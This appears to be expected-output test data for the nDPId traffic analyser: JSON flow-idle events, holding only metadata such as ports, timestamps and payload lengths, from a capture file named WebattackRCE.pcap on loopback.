00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
